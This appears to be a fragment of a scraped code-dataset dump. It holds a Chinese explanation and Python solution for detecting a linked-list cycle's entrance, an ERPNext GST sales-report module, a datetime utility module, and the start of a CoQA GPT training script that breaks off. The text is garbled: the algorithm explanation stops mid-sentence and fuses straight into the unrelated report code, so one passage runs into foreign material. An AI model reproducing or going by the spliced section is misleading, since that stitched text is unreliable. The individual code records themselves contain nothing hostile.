hh ,其中 F \\equiv h \\pmod CF≡h(modC) 。这是因为快指针在 FF 次迭代中遍历了 2F2F 个节点,且恰好有 FF 个在环中。继续迭代 C-hC−h 次,慢指针显然指向第 C-hC−h 号节点,而快指针也会指向相同的节点。原因在于,快指针从 hh 号节点出发遍历了 2(C-h)2(C−h) 个节点。\n\n\\begin{aligned} h + 2(C-h) &= 2C - h \\\\ &\\equiv C-h \\pmod C \\end{aligned}\nh+2(C−h)\n​\t\n \n=2C−h\n≡C−h(modC)\n​\t\n \n\n因此,如果列表是有环的,快指针和慢指针最后会同时指向同一个节点,因此被称为 相遇 。\n\n阶段 2\n\n给定阶段 1 找到的相遇点,阶段 2 将找到环的入口。首先我们初始化额外的两个指针: ptr1 ,指向链表的头, ptr2 指向相遇点。然后,我们每次将它们往前移动一步,直到它们相遇,它们相遇的点就是环的入口,返回这个节点。\n\n下面的图将更好的帮助理解和证明这个方法的正确性。\n\n\n\n我们利用已知的条件:慢指针移动 1 步,快指针移动 2 步,来说明它们相遇在环的入口处。(下面证明中的 tortoise 表示慢指针,hare 表示快指针)\n\n\\begin{aligned} 2 \\cdot distance(tortoise) &= distance(hare) \\\\ 2(F+a) &= F+a+b+a \\\\ 2F+2a &= F+2a+b \\\\ F &= b \\\\ \\end{aligned}\n2⋅distance(tortoise)\n2(F+a)\n2F+2a\nF\n​\t\n \n=distance(hare)\n=F+a+b+a\n=F+2a+b\n=b\n​\t\n \n\n因为 F=bF=b ,指针从 hh 点出发和从链表的头出发,最后会遍历相同数目的节点后在环的入口处相遇。\n\n下面的动画中动态地演示了整个算法过程:\n\n\n1 / 13\n\nJavaPython\n\nclass Solution(object):\n def getIntersect(self, head):\n tortoise = head\n hare = head\n\n # A fast pointer will either loop around a cycle and meet the slow\n # pointer or reach the `null` at the end of a non-cyclic list.\n while hare is not None and hare.next is not None:\n tortoise = tortoise.next\n hare = hare.next.next\n if tortoise == hare:\n return tortoise\n\n return None\n\n def detectCycle(self, head):\n if head is None:\n return None\n\n # If there is a cycle, the fast/slow pointers will intersect at some\n # node. Otherwise, there is no cycle, so we cannot find an e***ance to\n # a cycle.\n intersect = self.getIntersect(head)\n if intersect is None:\n return None\n\n # To find the e***ance to the cycle, we have two pointers traverse at\n # the same speed -- one from the front of the list, and the other from\n # the point of intersection.\n ptr1 = head\n ptr2 = intersect\n while ptr1 != ptr2:\n ptr1 = ptr1.next\n ptr2 = ptr2.next\n\n return ptr1\n\n复杂度分析\n\n时间复杂度:O(n)O(n)\n\n对有环列表,快指针和慢指针在 F+C-hF+C−h 次迭代以后会指向同一个节点,正如上面正确性证明所示, F+C-h \\leq F+C = nF+C−h≤F+C=n ,所以阶段 1 运行时间在 O(n)O(n) 时间以内,阶段 2 运行 F < nF=%(from_date)s\"),\n\t\t\t(\"to_date\", \" and posting_date<=%(to_date)s\")):\n\t\t\t\tif self.filters.get(opts[0]):\n\t\t\t\t\tconditions += opts[1]\n\n\t\tcustomers = frappe.get_all(\"Customer\", filters={\"customer_type\": self.customer_type})\n\n\t\tif self.filters.get(\"type_of_business\") == \"B2B\":\n\t\t\tconditions += \"\"\" and ifnull(invoice_type, '') != 'Export' and is_return != 1\n\t\t\t\tand customer in ('{0}')\"\"\".format(\"', '\".join([frappe.db.escape(c.name) for c in customers]))\n\n\t\tif self.filters.get(\"type_of_business\") in (\"B2C Large\", \"B2C Small\"):\n\t\t\tb2c_limit = frappe.db.get_single_value('GSt Settings', 'b2c_limit')\n\t\t\tif not b2c_limit:\n\t\t\t\tfrappe.throw(_(\"Please set B2C Limit in GST Settings.\"))\n\n\t\tif self.filters.get(\"type_of_business\") == \"B2C Large\":\n\t\t\tconditions += \"\"\" and SUBSTR(place_of_supply, 1, 2) != SUBSTR(company_gstin, 1, 2)\n\t\t\t\tand grand_total > {0} and is_return != 1 and customer in ('{1}')\"\"\".\\\n\t\t\t\t\tformat(flt(b2c_limit), \"', '\".join([frappe.db.escape(c.name) for c in customers])\t)\n\t\t\t\t\t\n\t\telif self.filters.get(\"type_of_business\") == \"B2C Small\":\n\t\t\tconditions += \"\"\" and (\n\t\t\t\tSUBSTR(place_of_supply, 1, 2) = SUBSTR(company_gstin, 1, 2)\n\t\t\t\t\tor grand_total <= {0}) and is_return != 1 and customer in ('{1}')\"\"\".\\\n\t\t\t\t\t\tformat(flt(b2c_limit), \"', '\".join([frappe.db.escape(c.name) for c in customers]))\n\n\t\telif self.filters.get(\"type_of_business\") == \"CDNR\":\n\t\t\tconditions += \"\"\" and is_return = 1 \"\"\"\n\n\t\telif self.filters.get(\"type_of_business\") == \"EXPORT\":\n\t\t\tconditions += \"\"\" and is_return !=1 and invoice_type = 'Export' \"\"\"\n\t\treturn conditions\n\n\tdef get_invoice_items(self):\n\t\tself.invoice_items = frappe._dict()\n\t\titems = frappe.db.sql(\"\"\"\n\t\t\tselect item_code, parent, base_net_amount\n\t\t\tfrom `tab%s Item`\n\t\t\twhere parent in (%s)\n\t\t\"\"\" % (self.doctype, ', '.join(['%s']*len(self.invoices))), tuple(self.invoices), as_dict=1)\n\n\t\tfor d in items:\n\t\t\tif d.item_code not in self.invoice_items.get(d.parent, {}):\n\t\t\t\tself.invoice_items.setdefault(d.parent, {}).setdefault(d.item_code, \n\t\t\t\t\tsum(i.get('base_net_amount', 0) for i in items \n\t\t\t\t\t\tif i.item_code == d.item_code and i.parent == d.parent))\n\n\tdef get_items_based_on_tax_rate(self):\n\t\tself.tax_details = frappe.db.sql(\"\"\"\n\t\t\tselect\n\t\t\t\tparent, account_head, item_wise_tax_detail, base_tax_amount_after_discount_amount\n\t\t\tfrom `tab%s`\n\t\t\twhere\n\t\t\t\tparenttype = %s and docstatus = 1\n\t\t\t\tand parent in (%s)\n\t\t\torder by account_head\n\t\t\"\"\" % (self.tax_doctype, '%s', ', '.join(['%s']*len(self.invoices.keys()))),\n\t\t\ttuple([self.doctype] + self.invoices.keys()))\n\n\t\tself.items_based_on_tax_rate = {}\n\t\tself.invoice_cess = frappe._dict()\n\t\tunidentified_gst_accounts = []\n\t\tfor parent, account, item_wise_tax_detail, tax_amount in self.tax_details:\n\t\t\tif account in self.gst_accounts.cess_account:\n\t\t\t\tself.invoice_cess.setdefault(parent, tax_amount)\n\t\t\telse:\n\t\t\t\tif item_wise_tax_detail:\n\t\t\t\t\ttry:\n\t\t\t\t\t\titem_wise_tax_detail = json.loads(item_wise_tax_detail)\n\t\t\t\t\t\tcgst_or_sgst = False\n\t\t\t\t\t\tif account in self.gst_accounts.cgst_account \\\n\t\t\t\t\t\t\tor account in self.gst_accounts.sgst_account:\n\t\t\t\t\t\t\tcgst_or_sgst = True\n\n\t\t\t\t\t\tif not (cgst_or_sgst or account in self.gst_accounts.igst_account):\n\t\t\t\t\t\t\tif \"gst\" in account.lower() and account not in unidentified_gst_accounts:\n\t\t\t\t\t\t\t\tunidentified_gst_accounts.append(account)\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tfor item_code, tax_amounts in item_wise_tax_detail.items():\n\t\t\t\t\t\t\ttax_rate = tax_amounts[0]\n\t\t\t\t\t\t\tif cgst_or_sgst:\n\t\t\t\t\t\t\t\ttax_rate *= 2\n\n\t\t\t\t\t\t\trate_based_dict = self.items_based_on_tax_rate\\\n\t\t\t\t\t\t\t\t.setdefault(parent, {}).setdefault(tax_rate, [])\n\t\t\t\t\t\t\tif item_code not in rate_based_dict:\n\t\t\t\t\t\t\t\trate_based_dict.append(item_code)\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tcontinue\n\t\tif unidentified_gst_accounts:\n\t\t\tfrappe.msgprint(_(\"Following accounts might be selected in GST Settings:\")\n\t\t\t\t+ \"
\" + \"
\".join(unidentified_gst_accounts), alert=True)\n\n\tdef get_gst_accounts(self):\n\t\tself.gst_accounts = frappe._dict()\n\t\tgst_settings_accounts = frappe.get_list(\"GST Account\",\n\t\t\tfilters={\"parent\": \"GST Settings\", \"company\": self.filters.company},\n\t\t\tfields=[\"cgst_account\", \"sgst_account\", \"igst_account\", \"cess_account\"])\n\n\t\tif not gst_settings_accounts:\n\t\t\tfrappe.throw(_(\"Please set GST Accounts in GST Settings\"))\n\n\t\tfor d in gst_settings_accounts:\n\t\t\tfor acc, val in d.items():\n\t\t\t\tself.gst_accounts.setdefault(acc, []).append(val)\n\n\tdef get_columns(self):\n\t\tself.tax_columns = [\n\t\t\t{\n\t\t\t\t\"fieldname\": \"rate\",\n\t\t\t\t\"label\": \"Rate\",\n\t\t\t\t\"fieldtype\": \"Int\",\n\t\t\t\t\"width\": 60\n\t\t\t},\n\t\t\t{\n\t\t\t\t\"fieldname\": \"taxable_value\",\n\t\t\t\t\"label\": \"Taxable Value\",\n\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\"width\": 100\n\t\t\t}\n\t\t]\n\t\tself.other_columns = []\n\n\t\tif self.filters.get(\"type_of_business\") == \"B2B\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_gstin\",\n\t\t\t\t\t\"label\": \"GSTIN/UIN of Recipient\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 150\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_name\",\n\t\t\t\t\t\"label\": \"Receiver Name\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\":80\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"reverse_charge\",\n\t\t\t\t\t\"label\": \"Reverse Charge\",\n\t\t\t\t\t\"fieldtype\": \"Data\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_type\",\n\t\t\t\t\t\"label\": \"Invoice Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"ecommerce_gstin\",\n\t\t\t\t\t\"label\": \"E-Commerce GSTIN\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t\t}\n\t\t\t\t]\n\n\t\telif self.filters.get(\"type_of_business\") == \"B2C Large\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"ecommerce_gstin\",\n\t\t\t\t\t\"label\": \"E-Commerce GSTIN\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 130\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t\t}\n\t\t\t\t]\n\t\telif self.filters.get(\"type_of_business\") == \"CDNR\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_gstin\",\n\t\t\t\t\t\"label\": \"GSTIN/UIN of Recipient\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 150\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_name\",\n\t\t\t\t\t\"label\": \"Receiver Name\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"return_against\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"reason_for_issuing_document\",\n\t\t\t\t\t\"label\": \"Reason For Issuing document\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 140\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"pre_gst\",\n\t\t\t\t\t\"label\": \"PRE GST\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 80\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"document_type\",\n\t\t\t\t\t\"label\": \"Document Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 80\n\t\t\t\t}\n\t\t\t]\n\t\telif self.filters.get(\"type_of_business\") == \"B2C Small\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"ecommerce_gstin\",\n\t\t\t\t\t\"label\": \"E-Commerce GSTIN\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 130\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"type\",\n\t\t\t\t\t\"label\": \"Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 50\n\t\t\t\t}\n\t\t\t]\n\t\telif self.filters.get(\"type_of_business\") == \"EXPORT\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"export_type\",\n\t\t\t\t\t\"label\": \"Export Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"port_code\",\n\t\t\t\t\t\"label\": \"Port Code\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"shipping_bill_number\",\n\t\t\t\t\t\"label\": \"Shipping Bill Number\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"shipping_bill_date\",\n\t\t\t\t\t\"label\": \"Shipping Bill Date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t}\n\t\t\t]\n\t\tself.columns = self.invoice_columns + self.tax_columns + self.other_columns","sub_path":"finance/finance/report/spm_gstr_1/spm_gstr_1.py","file_name":"spm_gstr_1.py","file_ext":"py","file_size_in_byte":14229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"71708269","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland\n# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus\n# This source code is licensed under the MIT license. See LICENSE in the repository root directory.\n# Author(s): Ville Heikkilä \n\n\"\"\"Module containing utility functions related to datetime values.\"\"\"\n\nimport datetime\nfrom typing import Union\n\nfrom tools.tools import FullLogger\n\nLOGGER = FullLogger(__name__)\n\nUTC_TIMEZONE_MARK = \"Z\"\nDIGITS_IN_MILLISECONDS = 3\n\n\ndef get_utcnow_in_milliseconds() -> str:\n \"\"\"Returns the current ISO 8601 format datetime string in UTC timezone.\"\"\"\n isoformat_with_milliseconds = isoformat_to_milliseconds(datetime.datetime.utcnow().isoformat())\n if isoformat_with_milliseconds is None:\n LOGGER.error(\"Unexpected error when trying to get current time in ISO 8601 format\")\n return \"1970-01-01T00:00:00.000Z\"\n\n return isoformat_with_milliseconds + UTC_TIMEZONE_MARK\n\n\ndef to_iso_format_datetime_string(datetime_value: Union[str, datetime.datetime]) -> Union[str, None]:\n \"\"\"Returns the given datetime value as ISO 8601 formatted string in UTC timezone.\n Accepts either datetime objects or strings.\n Return None if the given values was invalid.\"\"\"\n if isinstance(datetime_value, datetime.datetime):\n isoformat_with_milliseconds = isoformat_to_milliseconds(\n datetime_value.astimezone(datetime.timezone.utc).isoformat())\n if isoformat_with_milliseconds is None:\n return None\n return isoformat_with_milliseconds + UTC_TIMEZONE_MARK\n if isinstance(datetime_value, str):\n datetime_object = to_utc_datetime_object(datetime_value)\n return to_iso_format_datetime_string(datetime_object)\n return None\n\n\ndef to_utc_datetime_object(datetime_str: str) -> datetime.datetime:\n \"\"\"Returns a datetime object corresponding to the given ISO 8601 formatted string.\"\"\"\n return datetime.datetime.fromisoformat(datetime_str.replace(UTC_TIMEZONE_MARK, \"+00:00\"))\n\n\ndef isoformat_to_milliseconds(datetime_str: str) -> Union[str, None]:\n \"\"\"Returns the given ISO 8601 format datetime string in millisecond precision.\n Also removes timezone information.\"\"\"\n date_mark_index = datetime_str.find(\"T\")\n if date_mark_index < 0:\n return None\n\n plus_mark_index = datetime_str.find(\"+\", date_mark_index)\n if plus_mark_index >= 0:\n datetime_str = datetime_str[:plus_mark_index]\n\n minus_mark_index = datetime_str.find(\"-\", date_mark_index)\n if minus_mark_index >= 0:\n datetime_str = datetime_str[:minus_mark_index]\n\n second_fraction_mark_index = datetime_str.find(\".\")\n if second_fraction_mark_index >= 0:\n number_of_decimals = len(datetime_str) - second_fraction_mark_index\n return (\n datetime_str[:second_fraction_mark_index + DIGITS_IN_MILLISECONDS + 1] +\n \"0\" * max(DIGITS_IN_MILLISECONDS - number_of_decimals, 0)\n )\n\n return datetime_str + \".\" + \"0\" * DIGITS_IN_MILLISECONDS\n","sub_path":"domain-messages/simulation-tools/tools/datetime_tools.py","file_name":"datetime_tools.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"358163778","text":"import argparse\r\n\r\nfrom torch.utils.data import DataLoader\r\nimport sys\r\n\r\nimport clr as net_clr\r\nfrom System import Array, IntPtr, Int32, Int64\r\nfrom progress.bar import Bar as Bar\r\nimport os\r\nimport torch\r\nimport encoder\r\n\r\nimport random\r\nimport json\r\nimport numpy\r\nimport collections\r\nfrom collections import Counter\r\nfrom collections import OrderedDict\r\nimport math\r\n\r\nparser = argparse.ArgumentParser(description='CoQA machine reading comprehension training ...')\r\n\r\nparser.add_argument('--lib', default='Targets/', type=str, help='biglearn lib path')\r\nparser.add_argument('--vocab_file', default='/gpt-2/models/345M/', type=str, help='vocabulary file')\r\nparser.add_argument(\"--pad_token\", type=int, default=50256, help=\"id of [pad]\")\r\nparser.add_argument(\"--vocabsize\", type=int, default=50257, help=\"vocab size.\")\r\n\r\nparser.add_argument('--output_dir', default='/tmp_coqa/', type=str, help='output model')\r\n\r\nparser.add_argument('--init_checkpoint', default='/gpt-2/models/345M/', type=str, help='output model')\r\n\r\nparser.add_argument('--train_file', default='/coqa/coqa-train-v1.0.json', type=str, help='CoQA json for training. E.g., train-v1.1.json')\r\nparser.add_argument('--predict_file', default='/coqa/coqa-dev-v1.0.json', type=str, help='CoQA json for dev. E.g., dev-v1.1.json')\r\n\r\nparser.add_argument(\"--max_seq_length\", type=int, default=514, help=\"maximum sequence length\")\r\nparser.add_argument(\"--max_query_length\", type=int, default=64, help=\"maximum query length\")\r\nparser.add_argument(\"--max_ans_length\", type=int, default=32, help=\"maximum ans length\")\r\n\r\nparser.add_argument(\"--batch_size\", type=int, default=48, help=\"number of batch_size\")\r\nparser.add_argument(\"--num_workers\", type=int, default=0, help=\"dataloader worker size\")\r\nparser.add_argument(\"--gpu_id\", type=str, default=\"0\", help=\"gpu id\")\r\nparser.add_argument(\"--grad_acc\", type=int, default=1, help=\"gradient accumulate step.\")\r\n\r\nparser.add_argument(\"--learning_rate\", type=float, default=1.5e-5, help=\"The initial learning rate for Adam.\")\r\nparser.add_argument(\"--num_train_epochs\", type=float, default=2.0, help=\"Total number of training epochs to perform.\")\r\nparser.add_argument(\"--grad_clip\", type=float, default=1.0, help=\"gradient clip\")\r\nparser.add_argument(\"--warmup_proportion\", type=float, default=0.06, help=\"Proportion of training to perform linear learning rate warmup for. \")\r\nparser.add_argument(\"--save_checkpoints_steps\", type=int, default=1000, help=\"How often to save the model checkpoint.\")\r\nparser.add_argument('--weight_decay', type=float, default=0.0001, help='weight decay for optimization.')\r\n\r\nparser.add_argument(\"--beam_size\", type=int, default=1, help=\"beam search for prediction.\")\r\n\r\nparser.add_argument(\"--mode\", type=int, default=1, help=\"0:train; 1:mrc prediction; 2:query generation;\")\r\nparser.add_argument('--seed_type', default=0, type=int, metavar='S', help='0:originial gpt; 1: refined gpt.')\r\n\r\n\r\nargs = parser.parse_args()\r\n#args.vocab_path = args.seed_gpt\r\n\r\n#train_dataset = args.train_dataset\r\n#valid_dataset = ''\r\n#valid_json = ''\r\n\r\n#if not args.input == '':\r\n#train_dataset = args.input + '/train-v2.0.roberta.cook.json'\r\n# valid_dataset = args.input + '/dev-v2.0.roberta.cook.json'\r\n# valid_json = args.input + '/dev-v2.0.json' \r\n\r\nsys.path.append(args.lib) \r\nnet_clr.AddReference('BigLearn')\r\nnet_clr.AddReference('BigLearn.DeepNet')\r\n\r\n#cate = 2\r\n#unk_cate = 1\r\n\r\nfrom gpt_model import DistGPTTrainer, DistGPTPredictor\r\nfrom coqa_dataset import seq2seq_dataset, CoQAExample, read_coqa_examples, InputFeatures, convert_examples_to_features, write_predictions\r\n\r\n#from util import AverageMeter, Schedule, WorkStation\r\n#from util import SpanLogit, GetBestSpan, GetBestSpanLogProb\r\n#from squad_eval_v2 import call_validate\r\n\r\nimport BigLearn\r\nfrom BigLearn import GradientOptimizer, StructureLearner\r\n\r\n\r\ndevice_num = len(args.gpu_id.split(','))\r\nprint(\"set gpu number \", device_num)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu_id)\r\n\r\n\r\nclass AverageMeter(object):\r\n \"\"\"Computes and stores the average and current value\r\n \"\"\"\r\n def __init__(self, tmpfile=''):\r\n self.reset()\r\n \r\n if tmpfile == '':\r\n self.tmpwriter = None\r\n else:\r\n self.tmpwriter = open(tmpfile, 'w')\r\n\r\n def done(self):\r\n if tmpwriter != None:\r\n self.tmpwriter.close()\r\n\r\n def reset(self):\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n self.history = []\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\n for k in range(n):\r\n self.history.append(val)\r\n\r\n if self.tmpwriter != None:\r\n self.tmpwriter.write(str(val)+'\\n')\r\n self.tmpwriter.flush()\r\n\r\n\r\ndef predict_mrc(pred_loader, tokenizer, gptPredictor):\r\n all_results = []\r\n\r\n bar = Bar('prediction', max=len(pred_loader))\r\n gptPredictor.init()\r\n\r\n for batch_idx, data in enumerate(pred_loader):\r\n data = {key: value for key, value in data.items()}\r\n\r\n q_tokens = data['src_tokens']\r\n q_len = data['src_len']\r\n\r\n a_tokens = data['tgt_tokens']\r\n a_len = data['tgt_len']\r\n\r\n unique_id = data['unique_id']\r\n\r\n #_tokens = data['token']\r\n #_lens = data['len']\r\n _ans_tokens, _ans_len = gptPredictor.predict(q_tokens, q_len) \r\n\r\n for b in range(0, args.batch_size):\r\n _unique_id = unique_id[b].item()\r\n _ans_text = tokenizer.decode(_ans_tokens[b][:_ans_len[b]].numpy())\r\n all_results.append([_unique_id, _ans_text])\r\n\r\n bar.suffix = '({batch}/{size}) Total: {total:} | ETA: {eta:} '.format(\r\n batch=batch_idx + 1,\r\n size=len(pred_loader),\r\n total=bar.elapsed_td,\r\n eta=bar.eta_td)\r\n bar.next()\r\n gptPredictor.complete()\r\n bar.finish()\r\n return all_results\r\n\r\ndef train(task_loaders, num_train_steps, gptTrainer):\r\n #train_iter = iter(train_loader) \r\n epoch = 0\r\n update_cnt = 0\r\n bar = Bar('training', max=num_train_steps * args.grad_acc)\r\n\r\n rng = random.Random(9110)\r\n task_iter = {}\r\n\r\n dq_loss = AverageMeter()\r\n da_loss = AverageMeter()\r\n gptTrainer.init()\r\n for train_step in range(num_train_steps * args.grad_acc):\r\n\r\n task_idx = random.randint(0, len(task_loaders) - 1)\r\n task_loader = task_loaders[task_idx]\r\n try:\r\n data = next(task_iter[task_loader])\r\n except:\r\n task_iter[task_loader] = iter(task_loader)\r\n data = next(task_iter[task_loader])\r\n data = {key: value for key, value in data.items()}\r\n\r\n src_tokens = data['src_tokens']\r\n src_len = 